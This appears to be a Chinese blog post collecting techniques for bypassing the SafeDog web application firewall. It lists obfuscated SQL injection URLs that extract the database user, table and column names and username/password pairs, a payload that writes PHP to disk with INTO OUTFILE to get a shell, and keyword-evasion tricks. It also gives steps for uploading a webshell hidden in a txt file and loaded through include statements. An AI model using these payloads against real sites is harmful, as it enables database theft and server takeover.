绕过安全狗【后续再更新】
安全 更新 绕过 后续
2023-09-11 14:19:36 时间
sql绕过安全狗
get->post
借助burp
内联注释(加一些东西混淆)
看回显获取用户
url.php?id=-1'/*!50000union/*!(select*/1,2,3);
url.php?id=-1'/*!50000union/*!(select*/~1,2,3);
url.php?id=-1'/*!50000union/*!50000/*!(select*/~1,2,3)
http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,2,user/*!50000(*/))
1' /*!44111union*/ /*!44111select*/ 1, /*!44111user*//*!44111()*/#
1' /*!44111union*/ /*!44111select*/ 1,(/*!44111select*//*!44111password*//*!44111from*//*!44111users*/limit 0,1)#
获取表名
http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),table_name from information_schema.tables where table_schema=database/*!50000(*/))
获取列名
http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),column_name from information_schema.columns where table_name=’users’)
获取数据
http://127.0.0.1/killdog/dog.php?id=-1/*!12322union/*!11111/*!(select*/~1,2,group_concat(username,0x7e,password)from/*!`users`*/)
Getshell
http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/1,2,’<?php phpinfo();?>’ into outfile ‘dir’)
chunked编码(分割)
burp功能
其他
'&&true '&&false ' && true ' && false
'||true '||false ' || ture ' ||false
字符型的话也可以通过浮点数 1.0and 1=1 来绕过对and的检测
异或xor
上传绕过安全狗
方法1:
php/asp/aspx/jsp 通用需要借助文件包含(不管是自己构造还是系统就有)
将大马写到txt文件中,命名为dama.txt,再新建一个文本
asp的写入<!-#include file="dama.txt"->
保存,两文件放到同目录下,反问url/x.asp,然后访问即可
php的写入<?php require_once(dama.txt);?>
方法2:
有的安全狗不是识别内容,而是识别签名,可以使用工具将自己的脚本或者反弹shell的脚本加上签名,就可以绕过。
后面在继续更新。。。
相关文章
- SSH 安全加固篇:通过“运维密码”小程序实现 SSH 双因子认证
- 3 个在 Linux 中永久并安全删除文件和目录的方法
- 2020-10 补丁日: SAP多个产品高危漏洞安全风险通告
- 《移动安全》(5)drozer的下载与安装(上)
- web安全是什么?主要分为哪几部分?
- 【多线程】线程安全保护机制
- Tomcat8配置Https协议,Tomcat配置Https安全访问,Tomcat Https配置
- IBM公司对外开放其安全分析平台
- 《威胁建模:设计和交付更安全的软件》——3.4 否认威胁
- “建造智慧城市,从一开始就得考虑安全”
- 中国电信北京研究院发布“2016年上半年网站安全报告”
- 负面事件频发 智能终端隐现安全产业困境
- 鳄鱼还是木头?亚信安全提醒:APT攻击防范要当心“水坑”
- 如何优化及安全设置Linux系统
- 政府安全资讯精选 2017 年第一期:各国加强网络安全法规建设和隐私保护
- 在物联网时代如何打造安全的数据中心?